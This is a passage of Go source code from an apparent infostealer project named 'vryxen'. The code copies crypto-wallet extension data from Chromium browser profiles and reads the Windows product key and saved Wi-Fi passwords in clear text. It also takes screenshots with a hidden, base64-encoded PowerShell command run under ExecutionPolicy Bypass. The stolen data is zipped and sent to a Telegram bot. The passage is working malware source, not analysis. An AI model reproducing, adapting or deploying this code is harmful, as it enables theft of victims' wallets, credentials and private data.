Settings\\eigblbgjknlfbajkfhopmcojidlgcehm", 130 | "XinPay": "\\Local Extension Settings\\bocpokimicclpaiekenaeelehdjllofo", 131 | "Yoroi": "\\Local Extension Settings\\ffnbelfdoeiohenkjibnmadjiehjhajb", 132 | "iWallet": "\\Local Extension Settings\\kncchdigobghenbbaddojjnnaogfppfj", 133 | } 134 | 135 | users := common.GetUsers() 136 | browsersPath := browsers.GetChromiumBrowsers() 137 | var profilesPaths []browsers.Profile 138 | for _, user := range users { 139 | for name, path := range browsersPath { 140 | path = fmt.Sprintf("%s\\%s", user, path) 141 | if !fileutil.IsDir(path) { 142 | continue 143 | } 144 | 145 | browser := browsers.Browser{ 146 | Name: name, 147 | Path: path, 148 | User: strings.Split(user, "\\")[2], 149 | } 150 | 151 | if browser.Name == "Opera" || browser.Name == "OperaGX" { 152 | profilesPaths = append(profilesPaths, browsers.Profile{ 153 | Name: "Default", 154 | Path: browser.Path, 155 | Browser: browser, 156 | }) 157 | continue 158 | } 159 | 160 | profiles, err := os.ReadDir(path) 161 | if err != nil { 162 | continue 163 | } 164 | for _, profile := range profiles { 165 | if profile.IsDir() { 166 | files, err := os.ReadDir(fmt.Sprintf("%s\\%s", path, profile.Name())) 167 | if err != nil { 168 | continue 169 | } 170 | for _, file := range files { 171 | if file.Name() == "Web Data" { 172 | profilesPaths = append(profilesPaths, browsers.Profile{ 173 | Name: profile.Name(), 174 | Path: fmt.Sprintf("%s\\%s", path, profile.Name()), 175 | Browser: browser, 176 | }) 177 | } 178 | } 179 | } 180 | } 181 | } 182 | } 183 | 184 | if len(profilesPaths) == 0 { 185 | return 186 | } 187 | 188 | tempDir := fmt.Sprintf("%s\\extensions-temp", os.TempDir()) 189 | defer os.RemoveAll(tempDir) 190 | found := "" 191 | 192 | for _, profile := range profilesPaths { 193 | for name, path := range Paths { 194 | path = fmt.Sprintf("%s%s", profile.Path, path) 195 | if !fileutil.IsDir(path) { 196 | continue 197 | } 198 | 199 | err := fileutil.Copy(path, fmt.Sprintf("%s\\%s\\%s", tempDir, profile.Browser.User, name)) 200 | if err != nil { 201 | continue 202 | } 203 | found += fmt.Sprintf("\n+ %s - %s", profile.Browser.User, name) 204 | } 205 | } 206 | 207 | if found == "" { 208 | return 209 | } 210 | 211 | if len(found) > 4090 { 212 | found = "-" 213 | } 214 | 215 | tempZip := fmt.Sprintf("%s\\extensions.zip", os.TempDir()) 216 | if err := fileutil.Zip(tempDir, tempZip); err != nil { 217 | return 218 | } 219 | defer os.Remove(tempZip) 220 | 221 | message := "Extensions ```" + found + "```" 222 | requests.Send2TelegramMessage(botToken, chatId, message) 223 | requests.Send2TelegramDocument(botToken, chatId, tempZip) 224 | } -------------------------------------------------------------------------------- /internal/core/system/system.go: -------------------------------------------------------------------------------- 1 | package system 2 | import ( 3 | "encoding/json" 4 | "fmt" 5 | "os" 6 | "os/exec" 7 | "path/filepath" 8 | "strconv" 9 | "strings" 10 | "syscall" 11 | 12 | "github.com/shirou/gopsutil/v3/disk" 13 | "github.com/shirou/gopsutil/v3/mem" 14 | "golang.org/x/sys/windows/registry" 15 | 16 | "github.com/unf6/vryxen/pkg/utils/common" 17 | "github.com/unf6/vryxen/pkg/utils/requests" 18 | ) 19 | 20 | func GetOS() string { 21 | cmd := exec.Command("wmic", "os", "get", "Caption") 22 | cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true} 23 | 24 | out, err := cmd.Output() 25 | if err != nil { 26 | return "Not Found" 27 | } 28 | return strings.TrimSpace(strings.Split(string(out), "\n")[1]) 29 | } 30 | 31 | func GetCPU() string { 32 | cmd := exec.Command("wmic", "cpu", "get", "Name") 33 | cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true} 34 | 35 | out, err := cmd.Output() 36 | if err != nil { 37 | return "Not Found" 38 | } 39 | 40 | return strings.TrimSpace(strings.Split(string(out), "\n")[1]) 41 | } 42 | 43 | func GetGPU() string { 44 | cmd := exec.Command("wmic", "path", "win32_VideoController", "get", "name") 45 | cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true} 46 | 47 | out, err := cmd.Output() 48 | if err != nil { 49 | return "Not Found" 50 | } 51 | return strings.TrimSpace(strings.Split(string(out), "\n")[1]) 52 | } 53 | 54 | func GetRAM() string { 55 | virtualMemory, err := mem.VirtualMemory() 56 | if err != nil { 57 | return "Not Found" 58 | } 59 | return fmt.Sprintf("%.2f GB", float64(virtualMemory.Total)/(1024*1024*1024)) 60 | } 61 | 62 | func GetMAC() string { 63 | mac, err := common.GetMAC() 64 | if err != nil { 65 | return "Not Found" 66 | } 67 | 68 | return mac 69 | } 70 | 71 | func GetHWID() string { 72 | hwid, err := common.GetHWID() 73 | if err != nil { 74 | return "Not Found" 75 | } 76 | 77 | return hwid 78 | } 79 | 80 | func GetProductKey() string { 81 | key, err := registry.OpenKey(registry.LOCAL_MACHINE, `SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform`, registry.QUERY_VALUE) 82 | if err != nil { 83 | return "Not Found" 84 | } 85 | 86 | defer key.Close() 87 | 88 | value, _, err := key.GetStringValue("BackupProductKeyDefault") 89 | if err != nil { 90 | return "Not Found" 91 | } 92 | 93 | return value 94 | } 95 | 96 | func GetDisks() string { 97 | disks, err := disk.Partitions(false) 98 | if err != nil { 99 | return "Not Found" 100 | } 101 | var output string 102 | for _, part := range disks { 103 | usage, err := disk.Usage(part.Mountpoint) 104 | if err != nil { 105 | continue 106 | } 107 | output += fmt.Sprintf("%-9s %-9s %-9s %-9s\n", part.Device, strconv.Itoa(int(usage.Free/1024/1024/1024))+"GB", strconv.Itoa(int(usage.Total/1024/1024/1024))+"GB", strconv.Itoa(int(usage.UsedPercent))+"%") 108 | } 109 | 110 | if output == "" { 111 | return "Not Found" 112 | } 113 | 114 | return fmt.Sprintf("%-9s %-9s %-9s %-9s\n%s", "Drive", "Free", "Total", "Use", output) 115 | } 116 | 117 | func GetNetwork() string { 118 | res, err := requests.Get("http://ip-api.com/json") 119 | 120 | if err != nil { 121 | return "Not Found" 122 | } 123 | 124 | var data struct { 125 | Country string `json:"country"` 126 | RegionName string `json:"regionName"` 127 | City string `json:"city"` 128 | Zip string `json:"zip"` 129 | Lat float64 `json:"lat"` 130 | Lon float64 `json:"lon"` 131 | Isp string `json:"isp"` 132 | As string `json:"as"` 133 | IP string `json:"query"` 134 | } 135 | if err = json.Unmarshal(res, &data); err != nil { 136 | return "Not Found" 137 | } 138 | 139 | return fmt.Sprintf("IP: %s\nCountry: %s\nRegion: %s\nPostal: %s\nCity: %s\nISP: %s\nAS: %s\nLatitude: %f\nLongitude: %f", data.IP, data.Country, data.RegionName, data.Zip, data.City, data.Isp, data.As, data.Lat, data.Lon) 140 | } 141 | 142 | func GetWifi() string { 143 | cmd := exec.Command("netsh", "wlan", "show", "profiles") 144 | cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true} 145 | 146 | out, err := cmd.Output() 147 | if err != nil { 148 | return "Not Found" 149 | } 150 | 151 | var networks []string 152 | for _, line := range strings.Split(string(out), "\n") { 153 | if strings.Contains(line, "All User Profile") { 154 | networks = append(networks, strings.Split(line, ":")[1][1:len(strings.Split(line, ":")[1])-1]) 155 | } 156 | if strings.Contains(line, "Tous les utilisateurs") { 157 | networks = append(networks, strings.Split(line, ":")[1][1:len(strings.Split(line, ":")[1])-1]) 158 | } 159 | } 160 | 161 | var output string 162 | for _, network := range networks { 163 | cmd := exec.Command("netsh", "wlan", "show", "profile", network, "key=clear") 164 | cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true} 165 | 166 | out, err := cmd.Output() 167 | if err != nil { 168 | continue 169 | } 170 | for _, line := range strings.Split(string(out), "\n") { 171 | line = strings.TrimSpace(line) 172 | if strings.Contains(line, "Key Content") { 173 | output += fmt.Sprintf("%-20s %-20s\n", network, strings.TrimSpace(strings.Split(line, ": ")[1])) 174 | } 175 | if strings.Contains(line, "Contenu de la") { 176 | output += fmt.Sprintf("%-20s %-20s\n", network, strings.TrimSpace(strings.Split(line, ": ")[1])) 177 | } 178 | } 179 | } 180 | 181 | if output == "" { 182 | return "Not Found" 183 | } 184 | 185 | return fmt.Sprintf("%-20s %-20s\n%s", "Network", "Password", output) 186 | } 187 | 188 | func GetScreens() []string { 189 | dir := filepath.Join(os.TempDir(), common.RandString(10)) 190 | os.Mkdir(dir, os.ModePerm) 191 | 192 | cmd := exec.Command("powershell.exe", "-NoProfile", "-ExecutionPolicy", "Bypass", "-EncodedCommand", "JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=") 193 | cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true} 194 | cmd.Dir = dir 195 | cmd.Run() 196 | 197 | files, err := os.ReadDir(dir) 198 | if err != nil { 199 | return nil 200 | } 201 | 202 | var filepaths []string 203 | for _, file := range files { 204 | filepaths = append(filepaths, filepath.Join(dir, file.Name())) 205 | } 206 | 207 | return filepaths 208 | } 209 | 210 | func Run(botToken, chatId string) { 211 | users := strings.Join(common.GetUsers(), "\n") 212 | if len(users) > 4096 { 213 | users = "Too many users to display" 214 | } 215 | 216 | systemInfo := fmt.Sprintf( 217 | "System Information\n\nUser:\nUsername: %s\nHostname: %s\n\nSystem:\nOS: %s\nCPU: %s\nGPU: %s\nRAM: %s\nMAC: %s\nHWID: %s\nProduct Key: %s\n\nDisks:\n%s\n\nNetwork:\n%s\n\nWifi:\n%s\n\nAll Users:\n%s", 218 | os.Getenv("USERNAME"), os.Getenv("COMPUTERNAME"), 219 | GetOS(), GetCPU(), GetGPU(), GetRAM(), GetMAC(), GetHWID(), GetProductKey(), 220 | GetDisks(), GetNetwork(), GetWifi(), users, 221 | ) 222 | 223 | requests.Send2TelegramMessage(botToken, chatId, systemInfo) 224 | 225 | screenshots := GetScreens() 226 | 227 | for _, screenshot := range screenshots { 228 | requests.Send2TelegramDocument(botToken, chatId, screenshot) 229 | } 230 | } --------------------------------------------------------------------------------